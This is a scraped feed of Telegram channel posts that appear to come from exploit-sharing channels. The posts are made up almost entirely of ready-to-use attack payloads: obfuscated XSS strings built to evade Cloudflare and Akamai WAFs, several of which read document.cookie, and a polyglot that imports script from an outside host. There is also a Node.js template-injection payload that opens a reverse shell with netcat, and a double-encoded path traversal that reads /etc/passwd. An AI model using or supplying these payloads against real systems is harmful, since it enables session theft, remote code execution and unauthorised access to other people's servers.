XSS payload ⚡️
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
( WAF / Cloudflare Bypass )”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )<a href=[�]"� onmouseover=prompt(1)//">XYZ</a>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
( Encoded by chatGPT )jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Stored Xss payload 🔥
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload 💎
#xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)
#xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
XSS could be be triggers in url itself, no need for parameter injection ⚡️
Payloads:
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payloads:
%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}
so you can get RCE 💎
#rce #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
so you can get RCE 💎
#rce #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
short XSS polyglot
'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Stored XSS via cache poisoning ⚡️
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypassed strong Akamai WAF
payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
#Waf #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
#Waf #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload to bypass Akamai WAF
#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
?foobar=<foo%20bar=%250a%20onclick=<your js code>
#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️
/../../etc/passwd - 403 Forbidden 🚫
%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅
#Bypass #Payload
——————
@Learnexploit
@A3l3_KA4 💎
/../../etc/passwd - 403 Forbidden 🚫
%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅
#Bypass #Payload
——————
@Learnexploit
@A3l3_KA4 💎
A Cloudflare WAF bypass combining simple (but efficient) tricks
A payload with some obfuscation & filter evasion tricks
#CF #WAF #Bypass #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1
>`A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
#CF #WAF #Bypass #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM